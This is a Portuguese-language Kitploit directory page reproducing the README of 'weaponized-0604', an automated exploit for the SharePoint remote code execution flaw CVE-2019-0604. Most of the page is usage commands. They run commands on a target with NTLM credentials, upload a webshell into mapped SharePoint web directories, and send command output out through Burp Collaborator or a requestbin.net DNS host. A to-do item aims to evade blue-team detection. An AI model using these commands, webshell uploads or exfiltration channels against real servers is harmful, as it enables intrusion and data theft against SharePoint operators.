Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
weaponized-0604 — Ferramenta automatizada para explorar a CVE-2019-0604 do SharePoint | Kitploit
Ferramentas/GitHubGitHub/gh0st0ne/weaponized-0604
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubgh0st0ne/weaponized-0604

weaponized-0604

Ferramenta automatizada para explorar a CVE-2019-0604 do SharePoint

Ver Repositório
8há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-0604 Armamentizada

Ferramenta de Exploração Automatizada para Maximizar a CVE-2019-0604.

Requisito

O arquivo requirements.txt deve listar todas as bibliotecas Python usadas por esta ferramenta, e elas serão instaladas usando

root@kitploit:~
$ pip install -r requirements.txt

Exploração cega manual (com ou sem credencial)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>

Função de upload

faça upload de qualquer coisa legal (webshell, ferramenta de recon ...)

root@kitploit:~
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx

Mapeamento de Diretórios

root@kitploit:~
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/

Use OOB para obter resultado do comando

Com a extensão collaborator_http_api do Burp

  1. Instale collaborator_http_api.py no BurpSuite (Pro)?

  2. Certifique-se de que o BurpSuite esteja rodando na mesma máquina que este exploit.

  3. Execute, aproveite a saída recuperada :)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>

sharepoint-rce-oob-demo

Com DNSLog como requestbin.net

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"

Obter dados do DNS

root@kitploit:~
2050524956494c4547455320494e464f524d4154494f4e
...

Decodificado por você mesmo :)

root@kitploit:~
 PRIVILEGES INFORMATION
...

A FAZER

  • Analisador de Argumentos
  • SharePoint, CVE-2019-0604
  • dividir cmd em várias partes (em args.cmds)
  • especificar binário sob demanda, evitando detecção pela equipe azul. (atualmente com cmd.exe fixo)

Autor

  • Tree
Baixar ferramenta